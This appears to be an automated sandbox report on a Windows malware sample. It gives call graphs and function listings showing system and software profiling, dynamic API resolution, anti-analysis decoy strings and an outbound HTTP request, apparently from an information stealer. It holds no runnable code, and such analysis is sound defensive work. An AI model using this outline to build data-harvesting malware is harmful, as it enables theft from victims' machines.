15027->15028 15029 c11ebc 15028->15029 15030 c1a8a0 lstrcpy 15029->15030 15031 c11ec5 15030->15031 15032 c1a9b0 4 API calls 15031->15032 15033 c11ee5 15032->15033 15034 c1a8a0 lstrcpy 15033->15034 15035 c11eee 15034->15035 15671 c17b00 GetUserDefaultLocaleName 15035->15671 15038 c1a9b0 4 API calls 15039 c11f0e 15038->15039 15040 c1a8a0 lstrcpy 15039->15040 15041 c11f17 15040->15041 15042 c1a9b0 4 API calls 15041->15042 15043 c11f36 15042->15043 15044 c1a8a0 lstrcpy 15043->15044 15045 c11f3f 15044->15045 15046 c1a9b0 4 API calls 15045->15046 15047 c11f60 15046->15047 15048 c1a8a0 lstrcpy 15047->15048 15049 c11f69 15048->15049 15675 c17b90 15049->15675 15051 c11f80 15052 c1a920 3 API calls 15051->15052 15053 c11f93 15052->15053 15054 c1a8a0 lstrcpy 15053->15054 15055 c11f9c 15054->15055 15056 c1a9b0 4 API calls 15055->15056 15057 c11fc6 15056->15057 15058 c1a8a0 lstrcpy 15057->15058 15059 c11fcf 15058->15059 15060 c1a9b0 4 API calls 15059->15060 15061 c11fef 15060->15061 15062 c1a8a0 lstrcpy 15061->15062 15063 c11ff8 15062->15063 15687 c17d80 GetSystemPowerStatus 15063->15687 15066 c1a9b0 4 API calls 15067 c12018 15066->15067 15068 c1a8a0 lstrcpy 15067->15068 15069 c12021 15068->15069 15070 c1a9b0 4 API calls 15069->15070 15071 c12040 15070->15071 15072 c1a8a0 lstrcpy 15071->15072 15073 c12049 15072->15073 15074 c1a9b0 4 API calls 15073->15074 15075 c1206a 15074->15075 15076 c1a8a0 lstrcpy 15075->15076 15077 c12073 15076->15077 15078 c1207e GetCurrentProcessId 15077->15078 15689 c19470 OpenProcess 15078->15689 15081 c1a920 3 API calls 15082 c120a4 15081->15082 15083 c1a8a0 lstrcpy 15082->15083 15084 c120ad 15083->15084 15085 c1a9b0 4 API calls 15084->15085 15086 c120d7 15085->15086 15087 c1a8a0 lstrcpy 15086->15087 15088 c120e0 15087->15088 15089 c1a9b0 4 API calls 15088->15089 15090 c12100 15089->15090 15091 c1a8a0 lstrcpy 15090->15091 15092 c12109 15091->15092 15694 c17e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15092->15694 15095 c1a9b0 4 API calls 15096 c12129 15095->15096 15097 c1a8a0 lstrcpy 15096->15097 15098 c12132 15097->15098 15099 c1a9b0 4 API calls 15098->15099 15100 c12151 15099->15100 15101 c1a8a0 lstrcpy 15100->15101 15102 c1215a 15101->15102 15103 c1a9b0 4 API calls 15102->15103 15104 c1217b 15103->15104 15105 c1a8a0 lstrcpy 15104->15105 15106 c12184 15105->15106 15698 c17f60 15106->15698 15109 c1a9b0 4 API calls 15110 c121a4 15109->15110 15111 c1a8a0 lstrcpy 15110->15111 15112 c121ad 15111->15112 15113 c1a9b0 4 API calls 15112->15113 15114 c121cc 15113->15114 15115 c1a8a0 lstrcpy 15114->15115 15116 c121d5 15115->15116 15117 c1a9b0 4 API calls 15116->15117 15118 c121f6 15117->15118 15119 c1a8a0 lstrcpy 15118->15119 15120 c121ff 15119->15120 15711 c17ed0 GetSystemInfo wsprintfA 15120->15711 15123 c1a9b0 4 API calls 15124 c1221f 15123->15124 15125 c1a8a0 lstrcpy 15124->15125 15126 c12228 15125->15126 15127 c1a9b0 4 API calls 15126->15127 15128 c12247 15127->15128 15129 c1a8a0 lstrcpy 15128->15129 15130 c12250 15129->15130 15131 c1a9b0 4 API calls 15130->15131 15132 c12270 15131->15132 15133 c1a8a0 lstrcpy 15132->15133 15134 c12279 15133->15134 15713 c18100 GetProcessHeap RtlAllocateHeap 15134->15713 15137 c1a9b0 4 API calls 15138 c12299 15137->15138 15139 c1a8a0 lstrcpy 15138->15139 15140 c122a2 15139->15140 15141 c1a9b0 4 API calls 15140->15141 15142 c122c1 15141->15142 15143 c1a8a0 lstrcpy 15142->15143 15144 c122ca 15143->15144 15145 c1a9b0 4 API calls 15144->15145 15146 c122eb 15145->15146 15147 c1a8a0 lstrcpy 15146->15147 15148 c122f4 15147->15148 15719 c187c0 15148->15719 15151 c1a920 3 API calls 15152 c1231e 15151->15152 15153 c1a8a0 lstrcpy 15152->15153 15154 c12327 15153->15154 15155 c1a9b0 4 API calls 15154->15155 15156 c12351 15155->15156 15157 c1a8a0 lstrcpy 15156->15157 15158 c1235a 15157->15158 15159 c1a9b0 4 API calls 15158->15159 15160 c1237a 15159->15160 15161 c1a8a0 lstrcpy 15160->15161 15162 c12383 15161->15162 15163 c1a9b0 4 API calls 15162->15163 15164 c123a2 15163->15164 15165 c1a8a0 lstrcpy 15164->15165 15166 c123ab 15165->15166 15724 c181f0 15166->15724 15168 c123c2 15169 c1a920 3 API calls 15168->15169 15170 c123d5 15169->15170 15171 c1a8a0 lstrcpy 15170->15171 15172 c123de 15171->15172 15173 c1a9b0 4 API calls 15172->15173 15174 c1240a 15173->15174 15175 c1a8a0 lstrcpy 15174->15175 15176 c12413 15175->15176 15177 c1a9b0 4 API calls 15176->15177 15178 c12432 15177->15178 15179 c1a8a0 lstrcpy 15178->15179 15180 c1243b 15179->15180 15181 c1a9b0 4 API calls 15180->15181 15182 c1245c 15181->15182 15183 c1a8a0 lstrcpy 15182->15183 15184 c12465 15183->15184 15185 c1a9b0 4 API calls 15184->15185 15186 c12484 15185->15186 15187 c1a8a0 lstrcpy 15186->15187 15188 c1248d 15187->15188 15189 c1a9b0 4 API calls 15188->15189 15190 c124ae 15189->15190 15191 c1a8a0 lstrcpy 15190->15191 15192 c124b7 15191->15192 15732 c18320 15192->15732 15194 c124d3 15195 c1a920 3 API calls 15194->15195 15196 c124e6 15195->15196 15197 c1a8a0 lstrcpy 15196->15197 15198 c124ef 15197->15198 15199 c1a9b0 4 API calls 15198->15199 15200 c12519 15199->15200 15201 c1a8a0 lstrcpy 15200->15201 15202 c12522 15201->15202 15203 c1a9b0 4 API calls 15202->15203 15204 c12543 15203->15204 15205 c1a8a0 lstrcpy 15204->15205 15206 c1254c 15205->15206 15207 c18320 17 API calls 15206->15207 15208 c12568 15207->15208 15209 c1a920 3 API calls 15208->15209 15210 c1257b 15209->15210 15211 c1a8a0 lstrcpy 15210->15211 15212 c12584 15211->15212 15213 c1a9b0 4 API calls 15212->15213 15214 c125ae 15213->15214 15215 c1a8a0 lstrcpy 15214->15215 15216 c125b7 15215->15216 15217 c1a9b0 4 API calls 15216->15217 15218 c125d6 15217->15218 15219 c1a8a0 lstrcpy 15218->15219 15220 c125df 15219->15220 15221 c1a9b0 4 API calls 15220->15221 15222 c12600 15221->15222 15223 c1a8a0 lstrcpy 15222->15223 15224 c12609 15223->15224 15768 c18680 15224->15768 15226 c12620 15227 c1a920 3 API calls 15226->15227 15228 c12633 15227->15228 15229 c1a8a0 lstrcpy 15228->15229 15230 c1263c 15229->15230 15231 c1265a lstrlen 15230->15231 15232 c1266a 15231->15232 15233 c1a740 lstrcpy 15232->15233 15234 c1267c 15233->15234 15235 c01590 lstrcpy 15234->15235 15236 c1268d 15235->15236 15778 c15190 15236->15778 15238 c12699 15238->13669 15966 c1aad0 15239->15966 15241 c05009 InternetOpenUrlA 15245 c05021 15241->15245 15242 c050a0 InternetCloseHandle InternetCloseHandle 15244 c050ec 15242->15244 15243 c0502a InternetReadFile 15243->15245 15244->13673 15245->15242 15245->15243 15967 c098d0 15246->15967 15248 c10759 15249 c10a38 15248->15249 15250 c1077d 15248->15250 15251 c01590 lstrcpy 15249->15251 15252 c10799 StrCmpCA 15250->15252 15253 c10a49 15251->15253 15255 c10843 15252->15255 15256 c107a8 15252->15256 16143 c10250 15253->16143 15259 c10865 StrCmpCA 15255->15259 15258 c1a7a0 lstrcpy 15256->15258 15260 c107c3 15258->15260 15261 c10874 15259->15261 15298 c1096b 15259->15298 15262 c01590 lstrcpy 15260->15262 15263 c1a740 lstrcpy 15261->15263 15264 c1080c 15262->15264 15266 c10881 15263->15266 15267 c1a7a0 lstrcpy 15264->15267 15265 c1099c StrCmpCA 15268 c10a2d 15265->15268 15269 c109ab 15265->15269 15270 c1a9b0 4 API calls 15266->15270 15271 c10823 15267->15271 15268->13677 15272 c01590 lstrcpy 15269->15272 15273 c108ac 15270->15273 15274 c1a7a0 lstrcpy 15271->15274 15275 c109f4 15272->15275 15276 c1a920 3 API calls 15273->15276 15277 c1083e 15274->15277 15278 c1a7a0 lstrcpy 15275->15278 15279 c108b3 15276->15279 15970 c0fb00 15277->15970 15281 c10a0d 15278->15281 15282 c1a9b0 4 API calls 15279->15282 15283 c1a7a0 lstrcpy 15281->15283 15284 c108ba 15282->15284 15285 c10a28 15283->15285 15286 c1a8a0 lstrcpy 15284->15286 16086 c10030 15285->16086 15298->15265 15618 c1a7a0 lstrcpy 15617->15618 15619 c01683 15618->15619 15620 c1a7a0 lstrcpy 15619->15620 15621 c01695 15620->15621 15622 c1a7a0 lstrcpy 15621->15622 15623 c016a7 15622->15623 15624 c1a7a0 lstrcpy 15623->15624 15625 c015a3 15624->15625 15625->14500 15627 c047c6 15626->15627 15628 c04838 lstrlen 15627->15628 15652 c1aad0 15628->15652 15630 c04848 InternetCrackUrlA 15631 c04867 15630->15631 15631->14577 15633 c09af9 LocalAlloc 15632->15633 15634 c04eee 15632->15634 15633->15634 15635 c09b14 CryptStringToBinaryA 15633->15635 15634->14599 15634->14601 15635->15634 15636 c09b39 LocalFree 15635->15636 15636->15634 15638 c1a740 lstrcpy 15637->15638 15639 c18b74 15638->15639 15640 c1a740 lstrcpy 15639->15640 15641 c18b82 GetSystemTime 15640->15641 15643 c18b99 15641->15643 15642 c1a7a0 lstrcpy 15644 c18bfc 15642->15644 15643->15642 15644->14593 15646 c1a931 15645->15646 15647 c1a988 15646->15647 15649 c1a968 lstrcpy lstrcat 15646->15649 15648 c1a7a0 lstrcpy 15647->15648 15650 c1a994 15648->15650 15649->15647 15650->14596 15651->14711 15652->15630 15653->14721 15654->14862 15655->14864 15656->14872 15785 c177a0 15657->15785 15660 c176c6 RegOpenKeyExA 15662 c17704 RegCloseKey 15660->15662 15663 c176e7 RegQueryValueExA 15660->15663 15661 c11c1e 15661->14954 15662->15661 15663->15662 15665 c11c99 15664->15665 15665->14968 15667 c11e09 15666->15667 15667->15010 15669 c11e84 15668->15669 15670 c17a9a wsprintfA 15668->15670 15669->15024 15670->15669 15672 c11efe 15671->15672 15673 c17b4d 15671->15673 15672->15038 15792 c18d20 LocalAlloc CharToOemW 15673->15792 15676 c1a740 lstrcpy 15675->15676 15677 c17bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15676->15677 15684 c17c25 15677->15684 15678 c17c46 GetLocaleInfoA 15678->15684 15679 c17d18 15680 c17d28 15679->15680 15681 c17d1e LocalFree 15679->15681 15683 c1a7a0 lstrcpy 15680->15683 15681->15680 15682 c1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15682->15684 15686 c17d37 15683->15686 15684->15678 15684->15679 15684->15682 15685 c1a8a0 lstrcpy 15684->15685 15685->15684 15686->15051 15688 c12008 15687->15688 15688->15066 15690 c19493 GetModuleFileNameExA CloseHandle 15689->15690 15691 c194b5 15689->15691 15690->15691 15692 c1a740 lstrcpy 15691->15692 15693 c12091 15692->15693 15693->15081 15695 c12119 15694->15695 15696 c17e68 RegQueryValueExA 15694->15696 15695->15095 15697 c17e8e RegCloseKey 15696->15697 15697->15695 15699 c17fb9 GetLogicalProcessorInformationEx 15698->15699 15700 c18029 15699->15700 15701 c17fd8 GetLastError 15699->15701 15706 c189f0 2 API calls 15700->15706 15707 c17fe3 15701->15707 15710 c18022 15701->15710 15704 c189f0 2 API calls 15705 c12194 15704->15705 15705->15109 15708 c1807b 15706->15708 15707->15699 15707->15705 15793 c189f0 15707->15793 15796 c18a10 GetProcessHeap RtlAllocateHeap 15707->15796 15709 c18084 wsprintfA 15708->15709 15708->15710 15709->15705 15710->15704 15710->15705 15712 c1220f 15711->15712 15712->15123 15714 c189b0 15713->15714 15715 c1814d GlobalMemoryStatusEx 15714->15715 15718 c18163 __aulldiv 15715->15718 15716 c1819b wsprintfA 15717 c12289 15716->15717 15717->15137 15718->15716 15720 c187fb GetProcessHeap RtlAllocateHeap wsprintfA 15719->15720 15722 c1a740 lstrcpy 15720->15722 15723 c1230b 15722->15723 15723->15151 15725 c1a740 lstrcpy 15724->15725 15731 c18229 15725->15731 15726 c18263 15727 c1a7a0 lstrcpy 15726->15727 15729 c182dc 15727->15729 15728 c1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15728->15731 15729->15168 15730 c1a8a0 lstrcpy 15730->15731 15731->15726 15731->15728 15731->15730 15733 c1a740 lstrcpy 15732->15733 15734 c1835c RegOpenKeyExA 15733->15734 15735 c183d0 15734->15735 15736 c183ae 15734->15736 15738 c18613 RegCloseKey 15735->15738 15739 c183f8 RegEnumKeyExA 15735->15739 15737 c1a7a0 lstrcpy 15736->15737 15749 c183bd 15737->15749 15742 c1a7a0 lstrcpy 15738->15742 15740 c1843f wsprintfA RegOpenKeyExA 15739->15740 15741 c1860e 15739->15741 15743 c184c1 RegQueryValueExA 15740->15743 15744 c18485 RegCloseKey RegCloseKey 15740->15744 15741->15738 15742->15749 15745 c18601 RegCloseKey 15743->15745 15746 c184fa lstrlen 15743->15746 15747 c1a7a0 lstrcpy 15744->15747 15745->15741 15746->15745 15748 c18510 15746->15748 15747->15749 15750 c1a9b0 4 API calls 15748->15750 15749->15194 15751 c18527 15750->15751 15752 c1a8a0 lstrcpy 15751->15752 15753 c18533 15752->15753 15754 c1a9b0 4 API calls 15753->15754 15755 c18557 15754->15755 15756 c1a8a0 lstrcpy 15755->15756 15757 c18563 15756->15757 15758 c1856e RegQueryValueExA 15757->15758 15758->15745 15759 c185a3 15758->15759 15760 c1a9b0 4 API calls 15759->15760 15761 c185ba 15760->15761 15762 c1a8a0 lstrcpy 15761->15762 15763 c185c6 15762->15763 15764 c1a9b0 4 API calls 15763->15764 15765 c185ea 15764->15765 15766 c1a8a0 lstrcpy 15765->15766 15767 c185f6 15766->15767 15767->15745 15769 c1a740 lstrcpy 15768->15769 15770 c186bc CreateToolhelp32Snapshot Process32First 15769->15770 15771 c186e8 Process32Next 15770->15771 15772 c1875d CloseHandle 15770->15772 15771->15772 15777 c186fd 15771->15777 15773 c1a7a0 lstrcpy 15772->15773 15776 c18776 15773->15776 15774 c1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15774->15777 15775 c1a8a0 lstrcpy 15775->15777 15776->15226 15777->15771 15777->15774 15777->15775 15779 c1a7a0 lstrcpy 15778->15779 15780 c151b5 15779->15780 15781 c01590 lstrcpy 15780->15781 15782 c151c6 15781->15782 15797 c05100 15782->15797 15784 c151cf 15784->15238 15788 c17720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15785->15788 15787 c176b9 15787->15660 15787->15661 15789 c17780 RegCloseKey 15788->15789 15790 c17765 RegQueryValueExA 15788->15790 15791 c17793 15789->15791 15790->15789 15791->15787 15792->15672 15794 c189f9 GetProcessHeap HeapFree 15793->15794 15795 c18a0c 15793->15795 15794->15795 15795->15707 15796->15707 15798 c1a7a0 lstrcpy 15797->15798 15799 c05119 15798->15799 15800 c047b0 2 API calls 15799->15800 15801 c05125 15800->15801 15957 c18ea0 15801->15957 15803 c05184 15804 c05192 lstrlen 15803->15804 15805 c051a5 15804->15805 15806 c18ea0 4 API calls 15805->15806 15807 c051b6 15806->15807 15808 c1a740 lstrcpy 15807->15808 15809 c051c9 15808->15809 15810 c1a740 lstrcpy 15809->15810 15811 c051d6 15810->15811 15812 c1a740 lstrcpy 15811->15812 15813 c051e3 15812->15813 15814 c1a740 lstrcpy 15813->15814 15815 c051f0 15814->15815 15816 c1a740 lstrcpy 15815->15816 15817 c051fd InternetOpenA StrCmpCA 15816->15817 15818 c0522f 15817->15818 15819 c058c4 InternetCloseHandle 15818->15819 15820 c18b60 3 API calls 15818->15820 15826 c058d9 codecvt 15819->15826 15821 c0524e 15820->15821 15822 c1a920 3 API calls 15821->15822 15823 c05261 15822->15823 15824 c1a8a0 lstrcpy 15823->15824 15825 c0526a 15824->15825 15827 c1a9b0 4 API calls 15825->15827 15829 c1a7a0 lstrcpy 15826->15829 15828 c052ab 15827->15828 15830 c1a920 3 API calls 15828->15830 15838 c05913 15829->15838 15831 c052b2 15830->15831 15832 c1a9b0 4 API calls 15831->15832 15833 c052b9 15832->15833 15834 c1a8a0 lstrcpy 15833->15834 15835 c052c2 15834->15835 15836 c1a9b0 4 API calls 15835->15836 15837 c05303 15836->15837 15839 c1a920 3 API calls 15837->15839 15838->15784 15840 c0530a 15839->15840 15841 c1a8a0 lstrcpy 15840->15841 15842 c05313 15841->15842 15843 c05329 InternetConnectA 15842->15843 15843->15819 15844 c05359 HttpOpenRequestA 15843->15844 15846 c058b7 InternetCloseHandle 15844->15846 15847 c053b7 15844->15847 15846->15819 15848 c1a9b0 4 API calls 15847->15848 15849 c053cb 15848->15849 15850 c1a8a0 lstrcpy 15849->15850 15851 c053d4 15850->15851 15852 c1a920 3 API calls 15851->15852 15853 c053f2 15852->15853 15854 c1a8a0 lstrcpy 15853->15854 15855 c053fb 15854->15855 15856 c1a9b0 4 API calls 15855->15856 15857 c0541a 15856->15857 15858 c1a8a0 lstrcpy 15857->15858 15859 c05423 15858->15859 15860 c1a9b0 4 API calls 15859->15860 15861 c05444 15860->15861 15862 c1a8a0 lstrcpy 15861->15862 15863 c0544d 15862->15863 15864 c1a9b0 4 API calls 15863->15864 15865 c0546e 15864->15865 15866 c1a8a0 lstrcpy 15865->15866 15958 c18ea9 15957->15958 15959 c18ead CryptBinaryToStringA 15957->15959 15958->15803 15959->15958 15960 c18ece GetProcessHeap RtlAllocateHeap 15959->15960 15960->15958 15961 c18ef4 codecvt 15960->15961 15962 c18f05 CryptBinaryToStringA 15961->15962 15962->15958 15966->15241 16209 c09880 15967->16209 15969 c098e1 15969->15248 15971 c1a740 lstrcpy 15970->15971 15972 c0fb16 15971->15972 16144 c1a740 lstrcpy 16143->16144 16145 c10266 16144->16145 16146 c18de0 2 API calls 16145->16146 16147 c1027b 16146->16147 16148 c1a920 3 API calls 16147->16148 16149 c1028b 16148->16149 16150 c1a8a0 lstrcpy 16149->16150 16151 c10294 16150->16151 16152 c1a9b0 4 API calls 16151->16152 16153 c102b8 16152->16153 16210 c0988e 16209->16210 16213 c06fb0 16210->16213 16212 c098ad codecvt 16212->15969 16216 c06d40 16213->16216 16217 c06d63 16216->16217 16225 c06d59 16216->16225 16217->16225 16230 c06660 16217->16230 16219 c06dbe 16219->16225 16236 c069b0 16219->16236 16221 c06e2a 16222 c06ee6 VirtualFree 16221->16222 16224 c06ef7 16221->16224 16221->16225 16222->16224 16223 c06f41 16223->16225 16228 c189f0 2 API calls 16223->16228 16224->16223 16226 c06f26 FreeLibrary 16224->16226 16227 c06f38 16224->16227 16225->16212 16226->16224 16229 c189f0 2 API calls 16227->16229 16228->16225 16229->16223 16233 c0668f VirtualAlloc 16230->16233 16232 c06730 16234 c06743 VirtualAlloc 16232->16234 16235 c0673c 16232->16235 16233->16232 16233->16235 16234->16235 16235->16219 16237 c069c9 16236->16237 16241 c069d5 16236->16241 16238 c06a09 LoadLibraryA 16237->16238 16237->16241 16239 c06a32 16238->16239 16238->16241 16243 c06ae0 16239->16243 16246 c18a10 GetProcessHeap RtlAllocateHeap 16239->16246 16241->16221 16242 c06ba8 GetProcAddress 16242->16241 16242->16243 16243->16241 16243->16242 16244 c189f0 2 API calls 16244->16243 16245 c06a8b 16245->16241 16245->16244 16246->16245

                  Executed Functions

                  Function 00C19860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 c19860-c19874 call c19750 663 c19a93-c19af2 LoadLibraryA * 5 660->663 664 c1987a-c19a8e call c19780 GetProcAddress * 21 660->664 666 c19af4-c19b08 GetProcAddress 663->666 667 c19b0d-c19b14 663->667 664->663 666->667 668 c19b46-c19b4d 667->668 669 c19b16-c19b41 GetProcAddress * 2 667->669 671 c19b68-c19b6f 668->671 672 c19b4f-c19b63 GetProcAddress 668->672 669->668 673 c19b71-c19b84 GetProcAddress 671->673 674 c19b89-c19b90 671->674 672->671 673->674 675 c19bc1-c19bc2 674->675 676 c19b92-c19bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,01798E38), ref: 00C198A1
                  • GetProcAddress.KERNEL32(74DD0000,01798DA8), ref: 00C198BA
                  • GetProcAddress.KERNEL32(74DD0000,01798F88), ref: 00C198D2
                  • GetProcAddress.KERNEL32(74DD0000,01798EB0), ref: 00C198EA
                  • GetProcAddress.KERNEL32(74DD0000,01798D90), ref: 00C19903
                  • GetProcAddress.KERNEL32(74DD0000,01799480), ref: 00C1991B
                  • GetProcAddress.KERNEL32(74DD0000,01783DC0), ref: 00C19933
                  • GetProcAddress.KERNEL32(74DD0000,01783EE0), ref: 00C1994C
                  • GetProcAddress.KERNEL32(74DD0000,01798F70), ref: 00C19964
                  • GetProcAddress.KERNEL32(74DD0000,01798DC0), ref: 00C1997C
                  • GetProcAddress.KERNEL32(74DD0000,01798E80), ref: 00C19995
                  • GetProcAddress.KERNEL32(74DD0000,01798D78), ref: 00C199AD
                  • GetProcAddress.KERNEL32(74DD0000,01783E80), ref: 00C199C5
                  • GetProcAddress.KERNEL32(74DD0000,01798FA0), ref: 00C199DE
                  • GetProcAddress.KERNEL32(74DD0000,01798E50), ref: 00C199F6
                  • GetProcAddress.KERNEL32(74DD0000,01783DA0), ref: 00C19A0E
                  • GetProcAddress.KERNEL32(74DD0000,01798FB8), ref: 00C19A27
                  • GetProcAddress.KERNEL32(74DD0000,01799030), ref: 00C19A3F
                  • GetProcAddress.KERNEL32(74DD0000,01783FE0), ref: 00C19A57
                  • GetProcAddress.KERNEL32(74DD0000,01798E68), ref: 00C19A70
                  • GetProcAddress.KERNEL32(74DD0000,01783E40), ref: 00C19A88
                  • LoadLibraryA.KERNEL32(01798FD0,?,00C16A00), ref: 00C19A9A
                  • LoadLibraryA.KERNEL32(01798EC8,?,00C16A00), ref: 00C19AAB
                  • LoadLibraryA.KERNEL32(01798E08,?,00C16A00), ref: 00C19ABD
                  • LoadLibraryA.KERNEL32(01798F10,?,00C16A00), ref: 00C19ACF
                  • LoadLibraryA.KERNEL32(01798E98,?,00C16A00), ref: 00C19AE0
                  • GetProcAddress.KERNEL32(75A70000,01798EF8), ref: 00C19B02
                  • GetProcAddress.KERNEL32(75290000,01798DF0), ref: 00C19B23
                  • GetProcAddress.KERNEL32(75290000,01799018), ref: 00C19B3B
                  • GetProcAddress.KERNEL32(75BD0000,01798FE8), ref: 00C19B5D
                  • GetProcAddress.KERNEL32(75450000,01783E60), ref: 00C19B7E
                  • GetProcAddress.KERNEL32(76E90000,017994F0), ref: 00C19B9F
                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00C19BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00C19BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: ca43fa89cc2a9b5b330d7772668f414cb1b356585cdd3751b5aaf3f927d381fa
                  • Instruction ID: 62377313154dfd331d34e2b5149191f8c77e246becf1d9cec186d95303b68b2b
                  • Opcode Fuzzy Hash: ca43fa89cc2a9b5b330d7772668f414cb1b356585cdd3751b5aaf3f927d381fa
                  • Instruction Fuzzy Hash: 68A17CBD5C02009FE368EFAAED8C95637F9F74E32170D453AA605E3224D639944BDB12
                  Function 00C045C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 c045c0-c04695 RtlAllocateHeap 781 c046a0-c046a6 764->781 782 c046ac-c0474a 781->782 783 c0474f-c047a9 VirtualProtect 781->783 782->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C0460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C0479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C045DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C046B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C045C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C046AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C045F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C045E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C046C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C046CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04643
